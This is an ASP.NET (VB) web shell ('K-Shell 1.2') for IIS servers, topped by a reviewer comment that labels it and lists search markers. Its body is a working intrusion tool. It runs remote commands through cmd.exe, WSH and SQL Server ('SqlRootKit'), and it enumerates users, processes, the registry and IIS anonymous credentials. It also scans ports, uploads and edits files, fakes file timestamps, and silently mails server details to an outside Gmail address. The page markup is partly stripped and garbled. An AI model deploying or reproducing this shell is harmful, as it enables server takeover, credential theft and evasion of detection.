<%--
  Page header and title dispatch of an ASP.NET (VB) web-shell page; the shell
  nature is visible from the title strings assigned below.
  Review notes, limited to what this header shows:
    - validateRequest="false" switches off ASP.NET request validation for this page.
    - aspcompat="true" runs the page in ASP-compatibility mode.
    - The imports bring in file I/O, process handling, threading, cryptography,
      sockets, directory services and registry access.
    - Requests are steered by the "action" and "src" query-string parameters.
      Those parameter names and the literal title strings are fixed text, so
      they can serve as markers when searching web roots and request logs.
--%>
<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<%@ Import Namespace="System.Net.Sockets"%>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%@ import Namespace="Microsoft.Win32" %>
<%
' Download branch: taken only when action=down and the session flag
' "usersession" equals 1. The "src" query value is handed to downTheFile
' as received; no path check is visible at this call site. downTheFile is
' defined outside this block. The response ends right after the call.
if request.QueryString("action")="down" and session("usersession")=1 then
    downTheFile(request.QueryString("src"))
    response.End()
end if
' Title selection: here the "action" value only picks the string stored in
' TITLE. TITLE is assigned but not declared in this block, so its declaration
' must sit elsewhere in the page. This chain performs no session check; it
' sets a title whether or not the session flag is present.
Dim act as string = request.QueryString("action")
if act="cmd" then
    TITLE="CMD.NET"
elseif act="cmdw32" then
    TITLE="ASP.NET W32 Shell"
elseif act="cmdwsh" then
    TITLE="ASP.NET WSH Shell"
elseif act="sqlrootkit" then
    TITLE="SqlRootKit.NET"
elseif act="clonetime" then
    TITLE="Clone Time"
elseif act="information" then
    TITLE="Web Server Info"
elseif act="goto" then
    TITLE="K-Shell 1.2"
elseif act="pro1" then
    TITLE="List processes from server"
elseif act="pro2" then
    TITLE="List processes from server"
elseif act="user" then
    TITLE="List User Accounts"
elseif act="applog" then
    TITLE="List Application Event Log Entries"
elseif act="syslog" then
    TITLE="List System Event Log Entries"
elseif act="auser" then
    TITLE="IIS List Anonymous' User details"
elseif act="sqlman" then
    TITLE="MSSQL Management"
elseif act="scan" then
    TITLE="Port Scanner"
elseif act="iisspy" then
    TITLE="IIS Spy"
elseif act="sqltool" then
    TITLE="SQL Tool"
elseif act="regshell" then
    TITLE="Registry Shell"
else
    ' Any other action value (including none) falls back to the Host header
    ' sent by the client.
    TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<%=TITLE%> welcome !
<% Dim error_x as Exception Try if session("usersession")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Registry Shell - Application Event Log - System Log

" response.Write(guru) for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") guru="" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
Name Size ModifyTime Operate
<% guru= "
|Parent Directory|
" & xdir.name & "" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %> <% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ] Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ] Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by usersession.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ] Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command:

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ] Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ] Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ] Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ] Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ] Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ] Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ] Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ] Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ] Back

C# coded by Hackwol & Lenk, VB coded by usersession (19/08/2008)

Start IP : 127.0.0.1 --- End Ip : 127.0.0.1
Ports : 21,25,80,1433,3306,3389






<% case "iisspy" %>

[ IIS Spy ] Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ] Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ] Back

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName

<% case "sqlman" %>

[ MSSQL Query ] Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ] Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin] Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:

<% case "logout" session.Abandon() response.Write(" ÿÿÿÿÿÿÿÿÿÿÿÿ